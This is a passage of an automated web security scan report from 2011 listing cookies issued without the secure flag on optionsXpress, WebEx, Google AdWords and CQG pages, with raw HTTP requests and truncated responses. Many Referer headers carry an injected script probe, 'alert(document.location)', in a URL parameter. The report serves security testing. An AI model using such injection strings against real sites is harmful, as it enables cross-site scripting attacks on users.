Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

6.36. https://account.optionsxpress.com/inc/interface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

6.37. https://account.optionsxpress.com/inc/js/plugins/accordion.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

6.38. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

6.39. https://account.optionsxpress.com/inc/newaccount/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

6.40. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.41. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

6.42. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

6.43. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

6.44. https://account.optionsxpress.com/inc/newaccount/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

6.45. https://account.optionsxpress.com/inc/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

6.46. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Sep 2011 19:45:19 GMT
Expires: Thu, 08 Sep 2011 19:45:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

6.47. https://icewebinar.webex.com/icewebinar/lsr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /icewebinar/lsr.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icewebinar/lsr.php HTTP/1.1
Host: icewebinar.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:21 GMT
Server: Apache
Set-Cookie: galaxye_wl=R2995082818; path=/
Cache-Control: no-cache
Pragma: No-cache
Content-Length: 771
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="6">
<base href="https://icewebinar.webex.com/mw0306ld/mywebex/jsp/com
...[SNIP]...

6.48. https://interactivebrokers.webex.com/interactivebrokers/lsr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/lsr.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/lsr.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Content-Length: 797
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="5">
<base href="https://interactivebrokers.webex.com/mw0306lb/mywebex
...[SNIP]...

6.49. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/onstage/g.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/onstage/g.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Location: https://interactivebrokers.webex.com/mw0306lb/mywebex/default.do?nomenu=true&siteurl=interactivebrokers&service=6&main_url=https%3A%2F%2Finteractivebrokers.webex.com%2Fec0605lb%2Feventcenter%2Fevent%2FeventAction.do%3FtheAction%3Ddetail%26confViewID%3D-1%26siteurl%3Dinteractivebrokers%26%26%26
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html
Content-Length: 935

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://interactivebrokers.webex.c
...[SNIP]...

6.50. https://www.cqgtrader.com/Languages/USEng/main.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cqgtrader.com
Path:   /Languages/USEng/main.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Languages/USEng/main.asp HTTP/1.1
Host: www.cqgtrader.com
Connection: keep-alive
Referer: http://www.efutures.com/services/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrivateLabel=WebSite=CQG+Web+Trader&CustPhone=720%2D904%2D2980; ClientState=TraderID=&PrvLbl=cqg&IsLoggedOn=False&SQLSID=&StyleSheet=%2FLanguages%2FUSEng%2FPrvLbl%2Fcqg%2Fstylesheet%2Ecss&EP=cqg&Language=USEng&attempt=0&Disconnected=False&OSLastUpdate=0&LoggedOn=False&OSDeletionOccured=0&LocalAccounts=False

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP CURa ADMa DEVa OUR IND CNT PRE"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 1235
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:37:24 GMT
Set-Cookie: ClientState=TraderID=&PrvLbl=cqg&IsLoggedOn=False&SQLSID=&StyleSheet=%2FLanguages%2FUSEng%2FPrvLbl%2Fcqg%2Fstylesheet%2Ecss&EP=cqg&Language=USEng&attempt=0&Disconnected=False&OSLastUpdate=0&LoggedOn=False&OSDeletionOccured=0&LocalAccounts=False; path=/
Cache-control: private, no-cache


<HTML>
<HEAD>
<META HTTP-EQUIV="content-type" CONTENT="text/html; charset=utf-8">
<TITLE>CQG Web Trader</TITLE>
<SCRIPT>
   if (navigator.appName != "Microsoft Internet Explorer")
   {
       document
...[SNIP]...

6.51. https://www.optionsxpress.com/downloads/financial_services_guide.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /downloads/financial_services_guide.pdf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /downloads/financial_services_guide.pdf HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 18626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: TLTHID=D480F472402E51465C012E9BFA1894F1; Path=/; Domain=.optionsxpress.com
HostName: DAWEB29
Set-Cookie: TLTCNT=DAWEB290000000000191854
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title value="WC@FIRMNAME">optionsXpress | We're sorry but that request canno
...[SNIP]...

6.52. https://www.optionsxpress.com/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:54 GMT
Location: https://www.optionsxpress.com/login.asp?r=1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
